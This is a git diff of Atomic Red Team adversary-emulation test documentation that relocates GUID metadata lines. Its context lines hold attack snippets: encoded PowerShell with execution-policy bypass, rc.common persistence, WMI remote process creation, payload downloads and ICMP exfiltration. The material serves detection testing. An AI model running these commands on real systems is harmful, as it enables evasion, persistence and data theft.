## Atomic Test #3 - WinRM Access with Evil-WinRM - -auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d - An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled + **Supported Platforms:** Windows +**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d + + + #### Inputs: diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index d7874fa0..efb354ce 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -12,15 +12,17 @@ Binary padding effectively changes the checksum of the file and can also be used
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd - -auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a - Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a + + + #### Inputs: diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md index 0bc19e12..8f8c16f1 100644 --- a/atomics/T1027.002/T1027.002.md +++ b/atomics/T1027.002/T1027.002.md @@ -18,14 +18,16 @@ Utilities used to perform software packing are called packers. Example packers a
## Atomic Test #1 - Binary simply packed by UPX (linux) - -auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** Linux +**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4 + + + #### Inputs: @@ -54,16 +56,18 @@ rm /tmp/packed_bin
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux) - -auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** Linux +**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1 + + + #### Inputs: @@ -92,14 +96,16 @@ rm /tmp/packed_bin
## Atomic Test #3 - Binary simply packed by UPX - -auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** macOS +**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20 + + + #### Inputs: @@ -128,16 +134,18 @@ rm /tmp/packed_bin
## Atomic Test #4 - Binary packed by UPX, with modified headers - -auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** macOS +**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d + + + #### Inputs: diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index 4b1a7bcc..004bcf72 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -14,14 +14,16 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
## Atomic Test #1 - Compile After Delivery using csc.exe - -auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206 - Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206 + + + #### Inputs: @@ -64,16 +66,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile - -auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef - When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'. + **Supported Platforms:** Windows +**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef + + + #### Inputs: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 152fface..e40093ff 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -26,15 +26,17 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
## Atomic Test #1 - Decode base64 Data into Script - -auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb - Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb + + + @@ -57,15 +59,17 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell - -auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 - Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" + **Supported Platforms:** Windows +**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6 + + + #### Inputs: @@ -94,15 +98,17 @@ powershell.exe -EncodedCommand $EncodedCommand
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry - -auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec - Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec + + + #### Inputs: @@ -139,13 +145,15 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
## Atomic Test #4 - Execution from Compressed File - -auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f - Mimic execution of compressed executable. When successfully executed, calculator.exe will open. + **Supported Platforms:** Windows +**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f + + + #### Inputs: @@ -190,14 +198,16 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email - -auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad + + + #### Inputs: @@ -225,14 +235,16 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP - -auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319 + + + #### Inputs: diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 1e1ace1e..77b26949 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Data Transfer Size Limits - -auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a - Take a file/directory, split it into 5Mb chunks + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a + + + #### Inputs: diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index a6b8c381..a491d1e9 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -16,16 +16,18 @@ Utilities and commands that acquire this information include whoami
## Atomic Test #1 - System Owner/User Discovery - -auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa - Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa + + + #### Inputs: @@ -57,15 +59,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
## Atomic Test #2 - System Owner/User Discovery - -auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c - Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c + + + @@ -87,13 +91,15 @@ who
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView) - -auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca - Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca + + + diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 9087162b..c2f528f3 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -26,15 +26,17 @@
## Atomic Test #1 - Masquerading as Windows LSASS process - -auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717 - Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session + **Supported Platforms:** Windows +**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717 + + + @@ -59,15 +61,17 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
## Atomic Test #2 - Masquerading as Linux crond process. - -auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 - Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. + **Supported Platforms:** Linux +**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556 + + + @@ -92,15 +96,17 @@ rm /tmp/crond
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe - -auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 - Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0 + + + @@ -125,15 +131,17 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe - -auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 - Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23 + + + @@ -158,15 +166,17 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe - -auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa - Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa + + + @@ -191,15 +201,17 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe - -auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 - Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086 + + + #### Inputs: @@ -244,13 +256,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Masquerading - windows exe running as different windows exe - -auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 - Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe + **Supported Platforms:** Windows +**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0 + + + #### Inputs: @@ -282,16 +296,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
## Atomic Test #8 - Malicious process Masquerading as LSM.exe - -auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f - Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f + + + @@ -317,15 +333,17 @@ del C:\lsm.exe >nul 2>&1
## Atomic Test #9 - File Extension Masquerading - -auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc - download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) + **Supported Platforms:** Windows +**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc + + + #### Inputs: diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md index 7c1348a8..cc23c8db 100644 --- a/atomics/T1036.004/T1036.004.md +++ b/atomics/T1036.004/T1036.004.md @@ -14,13 +14,15 @@ Tasks or services contain other fields, such as a description, that adversaries
## Atomic Test #1 - Creating W32Time similar named service using schtasks - -auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 - Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 + + + @@ -45,13 +47,15 @@ schtasks /tn win32times /delete /f
## Atomic Test #2 - Creating W32Time similar named service using sc - -auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66 - Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66 + + + diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index aab962e3..906ddca2 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -12,13 +12,15 @@ Adversaries may also use the same icon of the file they are trying to mimic. ## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. - -auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 - Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24 + + + #### Inputs: diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md index 72ccf8b3..6a9c6ddc 100644 --- a/atomics/T1036.006/T1036.006.md +++ b/atomics/T1036.006/T1036.006.md @@ -14,13 +14,15 @@ Adversaries can use this feature to trick users into double clicking benign-look
## Atomic Test #1 - Space After Filename - -auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f - Space After Filename + **Supported Platforms:** macOS +**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f + + + #### Run it with these steps! diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index e1e4f50b..7c5ef536 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -12,13 +12,15 @@ Renaming abusable system utilities to evade security monitoring is also a form o
## Atomic Test #1 - System File Copied to Unusual Location - -auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd - It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd + + + diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md index 500ffdb3..40211c19 100644 --- a/atomics/T1037.001/T1037.001.md +++ b/atomics/T1037.001/T1037.001.md @@ -12,14 +12,16 @@ Adversaries may use these scripts to maintain persistence on a single system. De
## Atomic Test #1 - Logon Scripts - -auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. + **Supported Platforms:** Windows +**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231 + + + #### Inputs: diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md index c642506b..145b05de 100644 --- a/atomics/T1037.002/T1037.002.md +++ b/atomics/T1037.002/T1037.002.md @@ -12,13 +12,15 @@ Adversaries may use these login hooks to maintain persistence on a single system
## Atomic Test #1 - Logon Scripts - Mac - -auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - Mac logon script + **Supported Platforms:** macOS +**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4 + + + #### Run it with these steps! diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 94d9c640..d7876f5e 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -20,15 +20,17 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
## Atomic Test #1 - rc.common - -auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de + + + @@ -48,13 +50,15 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
## Atomic Test #2 - rc.common - -auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a - Modify rc.common + **Supported Platforms:** Linux +**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a + + + @@ -82,13 +86,15 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
## Atomic Test #3 - rc.local - -auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 - Modify rc.local + **Supported Platforms:** Linux +**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102 + + + diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md index 516684aa..278fe1fc 100644 --- a/atomics/T1037.005/T1037.005.md +++ b/atomics/T1037.005/T1037.005.md @@ -14,15 +14,17 @@ An adversary can create the appropriate folders/files in the StartupItems direct
## Atomic Test #1 - Add file to Local Library StartupItems - -auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + **Supported Platforms:** macOS +**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198 + + + diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index e2cb05d4..e2076782 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -20,15 +20,17 @@ Network sniffing may also reveal configuration details, such as running services
## Atomic Test #1 - Packet Capture Linux - -auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e - Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + **Supported Platforms:** Linux +**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e + + + #### Inputs: @@ -66,15 +68,17 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #2 - Packet Capture macOS - -auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608 - Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. + **Supported Platforms:** macOS +**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608 + + + #### Inputs: @@ -112,16 +116,18 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #3 - Packet Capture Windows Command Prompt - -auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca - Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". + **Supported Platforms:** Windows +**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca + + + #### Inputs: @@ -173,14 +179,16 @@ Start-Process $env:temp\npcap_installer.exe
## Atomic Test #4 - Windows Internal Packet Capture - -auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528 - Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528 + + + diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index f921f6a0..c97b6af1 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -18,15 +18,17 @@ Within cloud environments, adversaries may attempt to discover services running
## Atomic Test #1 - Port Scan - -auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 - Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540 + + + @@ -49,15 +51,17 @@ done
## Atomic Test #2 - Port Scan Nmap - -auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f - Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f + + + #### Inputs: @@ -98,13 +102,15 @@ echo "Install nmap on the machine to run the test."; exit 1;
## Atomic Test #3 - Port Scan NMap for Windows - -auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df - Scan ports to check for listening ports for the local host 127.0.0.1 + **Supported Platforms:** Windows +**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df + + + #### Inputs: @@ -143,13 +149,15 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
## Atomic Test #4 - Port Scan using python - -auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c - Scan ports to check for listening ports with python + **Supported Platforms:** Windows +**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c + + + #### Inputs: diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index eb510624..7b2812cb 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -26,14 +26,16 @@ An adversary can use WMI to interact with local and remote systems and use it as
## Atomic Test #1 - WMI Reconnaissance Users - -auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea - An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea + + + @@ -53,14 +55,16 @@ wmic useraccount get /ALL /format:csv
## Atomic Test #2 - WMI Reconnaissance Processes - -auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 - An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2 + + + @@ -80,14 +84,16 @@ wmic process get caption,executablepath,commandline /format:csv
## Atomic Test #3 - WMI Reconnaissance Software - -auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 - An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. + **Supported Platforms:** Windows +**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414 + + + @@ -107,17 +113,19 @@ wmic qfe get description,installedOn /format:csv
## Atomic Test #4 - WMI Reconnaissance List Remote Services - -auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 - An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable + **Supported Platforms:** Windows +**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3 + + + #### Inputs: @@ -143,14 +151,16 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
## Atomic Test #5 - WMI Execute Local Process - -auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 - This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. + **Supported Platforms:** Windows +**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 + + + #### Inputs: @@ -179,15 +189,17 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
## Atomic Test #6 - WMI Execute Remote Process - -auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b - This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b + + + #### Inputs: @@ -219,9 +231,6 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command - -auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c - Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: @@ -229,9 +238,14 @@ Where the –EncodedCommand, once decoded, would resemble: The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + **Supported Platforms:** Windows +**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c + + + @@ -251,14 +265,16 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
## Atomic Test #8 - Create a Process using obfuscated Win32_Process - -auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 - This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32) + **Supported Platforms:** Windows +**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43 + + + #### Inputs: diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 0390ce51..db4db939 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -20,15 +20,17 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff - A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff + + + #### Run it with these steps! @@ -56,15 +58,17 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP - -auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e - Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e + + + #### Inputs: @@ -90,13 +94,15 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
